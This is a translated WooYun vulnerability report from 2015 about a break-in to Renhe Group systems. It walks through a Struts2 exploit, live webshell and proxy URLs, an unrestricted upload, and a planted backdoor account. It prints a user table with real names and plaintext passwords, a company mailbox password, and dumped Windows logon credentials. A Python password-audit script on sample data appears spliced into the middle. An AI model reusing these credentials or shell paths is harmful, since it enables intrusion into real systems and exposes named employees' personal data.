
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2015-0161220

Vulnerability title: A Renhe Group (仁和集团) system vulnerability (intranet roaming / database / multiple systems / 3389 login / nearly 30 subsidiaries)

Related vendor: Renhe Group (仁和集团)

Vulnerability author: DNS

Submitted: 2015-12-14 15:29

Fix deadline: 2016-01-25 18:01

Disclosed: 2016-01-25 18:01

Vulnerability type: command execution

Severity: High

Self-assessed Rank: 20

Vulnerability status: vendor could not be contacted, or the vendor actively ignored it

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-25: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

20
Involves nearly 30 subsidiary companies of the group

Detailed description:

It starts with an ST2 (Struts2) bug:
http://218.87.194.57:8080/suppler/login/login_login.action
The supplier management platform; got a shell straight away.

(screenshot: 11111.png)


Chopper (菜刀) address: http://218.87.194.57:8080/suppler/user/config.jsp
Intranet proxy address: http://218.87.194.57:8080/suppler/js/conn.jsp
Big webshell (大马) address: http://218.87.194.57:8080/suppler/js/config.jsp
Since it runs with SYSTEM privileges:

(screenshot: 1.png)

(screenshot: 2.png)

(screenshot: 3.png)

(screenshot: 4.png)

(screenshot: 5.png)


As well as files on other servers shared with this server.
Read the system database of home.renhe.com.
Now on to the second system:
http://home.renhe.com/login/login_index.h

(screenshot: 4.png)


PS: looking for a pretty girl's QQ.
Got the user passwords from before.
Lots of user passwords are "1", and others are four pure digits.
Log in.

(screenshot: 6.png)


Logged in.
In the place for posting status updates, attachments can be uploaded without any restriction.

(screenshot: 上传shell.png, uploading the shell)


Obtained shell: http://home.renhe.com/uploads/2015/12/14/201512348124337.253.jsp
Same SYSTEM privileges.
Chopper: http://home.renhe.com/uploads/2015/12/14/config.jsp
Intranet proxy: http://home.renhe.com/js/conn.jsp
Let's look at the files.

(screenshot: 1.png)

(screenshot: 2.png)

(screenshot: 3.png)

(screenshot: 4.png)

(screenshot: 5.png)


All the databases, source code and backups are there.
Backend: http://home.renhe.com/manage.jsp

"id"	"username"	"loginName"	"loginPsw"	"lower_level"	"parentId"	"roleId"	"createDate"	"lastLoginDate"	"loginCount"	"lastLoginIP"	"status"	"status_marathon"	"status_half"	"status_9km"	"status_mini"	"count_marathon"	"count_half"	"count_9km"	"count_mini"	"count_marathon_stage"	"count_half_stage"	"count_9km_stage"	"count_mini_stage"	"group_id"
"1" "系统超级管理员" "admin" "RHZJ2014" "no" "" "1" "2010-8-19 14:52:04" "2015-12-11 14:32:15" "3822" "192.168.2.105" "0" "true" "true" "true" "true" "1000" "1100" "1000" "1000" "0" "0" "0" "0" "5"
"47" "产品添加" "chanpin" "111111" "no" "" "" "2014-9-2 09:09:01" "2014-10-20 17:51:28" "135" "127.0.0.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "9"
"50" "视频发布人员1" "video1" "video1" "no" "" "15" "2014-9-20 15:30:35" "2014-9-20 16:05:58" "1" "127.0.0.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"51" "视频发布人员2" "video2" "video2" "no" "" "15" "2014-9-20 15:31:00" "2014-9-20 15:31:00" "0" "0.0.0.0" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"52" "管理员" "xieguan" "xieguan" "no" "" "" "2014-11-17 17:05:10" "2015-1-31 11:01:24" "18" "119.251.46.167" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"57" "陈荷荷" "chenhh" "123456" "no" "" "" "2014-11-24 12:08:19" "2015-12-7 14:27:08" "125" "172.16.22.36" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"58" "罗俊" "huangbo" "123456" "no" "" "" "2014-11-24 13:30:40" "2015-3-3 14:52:48" "46" "218.87.194.45" "1" "" "" "" "" "" "" "" "" "" "" "" "" "18"
"60" "任艳军" "renyj" "123456" "no" "" "" "2014-11-24 15:56:17" "2014-11-24 16:02:41" "2" "124.192.28.18" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"61" "黄波" "huangbo" "454910498" "no" "" "" "2014-11-26 14:22:53" "2014-11-26 15:01:56" "7" "218.87.194.45" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"62" "辛丽娇" "xinlj" "xin5201314" "no" "" "" "2014-11-28 13:38:49" "2015-5-19 09:37:06" "12" "192.168.218.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"63" "胡旭玲" "huxl" "hxl331200" "no" "" "" "2015-3-23 17:28:16" "2015-11-26 10:15:28" "23" "192.168.195.4" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
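The export above shows the security problem on the defender's side of this report: credentials stored in plaintext, and values that are trivially weak (123456, a login name reused as its own password, one-digit or four-digit numeric passwords). What follows is an added example, not code from the report or from the vendor's systems: a Python audit that parses an export in the same quoted, whitespace-separated layout, reports whether the password column is stored in plaintext at all, and flags weak values per account. The column names follow the report's header; every row, login name and password value in SAMPLE_EXPORT is constructed sample data, and COMMON_PASSWORDS is a small illustrative list, not a real wordlist.

```python
"""Audit an exported user table for plaintext and weak passwords.

Added example, not part of the WooYun report. Column names mirror the
report's export header (id, username, loginName, loginPsw, ...); all row
values below are constructed sample data.
"""
import re
import shlex
from collections import Counter

# Constructed sample export in the same quoted, whitespace-separated layout
# as the report's dump (header tab-separated, rows space-separated).
SAMPLE_EXPORT = """\
"id"\t"username"\t"loginName"\t"loginPsw"\t"roleId"\t"lastLoginIP"
"1" "超级管理员" "admin" "Passw0rd!Xy7" "1" "192.168.2.105"
"2" "产品添加" "chanpin" "111111" "" "127.0.0.1"
"3" "视频发布" "video1" "video1" "15" "127.0.0.1"
"4" "张三" "zhangs" "123456" "" "172.16.22.36"
"5" "李四" "lis" "1" "" "10.0.0.7"
"6" "王五" "wangw" "8e4d6e2a7b0c1f3d" "" "10.0.0.9"
"""

# Illustrative list of frequently chosen passwords (constructed, not a wordlist).
COMMON_PASSWORDS = {"123456", "111111", "password", "admin", "123123", "12345678"}

# Shapes a properly stored credential would have: unsalted hex digests of
# MD5/SHA-1/SHA-256 length, or a modern salted-hash prefix.
HEX_DIGEST = re.compile(r"[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64}")
HASH_PREFIXES = ("$2a$", "$2b$", "$2y$", "$argon2", "$pbkdf2", "$6$", "$5$")


def parse_export(text):
    """Parse quoted fields separated by tabs or spaces into a list of dicts."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = shlex.split(lines[0])  # shlex handles "" and quoted non-ASCII
    return [dict(zip(header, shlex.split(ln))) for ln in lines[1:]]


def looks_hashed(value):
    """True if the stored value has the shape of a hash rather than a password."""
    return bool(HEX_DIGEST.fullmatch(value)) or value.startswith(HASH_PREFIXES)


def password_findings(login_name, password):
    """Return a list of weakness labels for one account (empty if none)."""
    findings = []
    if not password:
        findings.append("empty")
    elif password in COMMON_PASSWORDS:
        findings.append("common")
    if password and password.lower() == login_name.lower():
        findings.append("equals-username")
    if password.isdigit() and len(password) <= 6:
        findings.append("short-numeric")
    if 0 < len(password) < 8:
        findings.append("too-short")
    return findings


def audit(text, password_col="loginPsw", login_col="loginName"):
    """Audit an export: plaintext-storage verdict plus per-account findings."""
    rows = parse_export(text)
    stored_plaintext = any(not looks_hashed(r[password_col]) for r in rows)
    weak = {}
    for row in rows:
        findings = password_findings(row[login_col], row[password_col])
        if findings:
            weak[row[login_col]] = findings
    return {"plaintext_storage": stored_plaintext, "weak": weak}


def summarize(result):
    """Count how often each weakness label occurs across flagged accounts."""
    return Counter(label for labels in result["weak"].values() for label in labels)


if __name__ == "__main__":
    result = audit(SAMPLE_EXPORT)
    print("password column stored in plaintext:", result["plaintext_storage"])
    for login, labels in result["weak"].items():
        print(f"  {login}: {', '.join(labels)}")
    print("totals:", dict(summarize(result)))
```

The plaintext verdict is deliberately the first output: once a password column fails `looks_hashed`, every other finding is secondary, because the remediation (hash with a salted, slow KDF and force a reset) is the same whatever the individual values are. Treat the per-account labels as a reset priority list, not as a substitute for that fix.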


After logging into the backend, an email account can be found:

(screenshot: 后台.png, the backend)

(screenshot: 明文.png, plaintext)


service@renhe.com
Renhe2014@qwe


With this, the entire company structure and address book can be obtained;
employee address books for roughly 30-odd companies.

(screenshot: 公司架构.png, company structure)

(screenshot: 公司架构2.png, company structure 2)

(screenshot: 邮件.png, email)

(screenshot: 邮箱2.png, mailbox 2)


I had no choice but to add a user debug$ with password debug.123! to this system. Sorry.
Already obtained a great deal of information; checked, and there is no domain.
Here are the user passwords that were read out:

Authentication Id:0;996
Authentication Package:Negotiate
Primary User:NETWORK SERVICE
Authentication Domain:NT AUTHORITY
* User: WWW-6C265A4688B$
* Domain: WORKGROUP
* Password:
Authentication Id:0;1100461
Authentication Package:NTLM
Primary User:rhzjzc
Authentication Domain:WWW-6C265A4688B
* User: rhzjzc
* Domain: WWW-6C265A4688B
* Password: zj.888.cn2012
Authentication Id:0;997
Authentication Package:Negotiate
Primary User:LOCAL SERVICE
Authentication Domain:NT AUTHORITY
(LUID ERROR)
Authentication Id:0;44089
Authentication Package:NTLM
Primary User:
Authentication Domain:
(LUID ERROR)
Authentication Id:0;999
Authentication Package:NTLM
Primary User:WWW-6C265A4688B$
Authentication Domain:WORKGROUP
(LUID ERROR)


That's it. home.renhe.com can jump straight to the OA.
The proxy is dead slow. Exhausting.

Proof of vulnerability:

(screenshot: 3333333333.png)

Fix recommendation:

Copyright notice: please credit the source when reposting: DNS@WooYun (乌云)


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)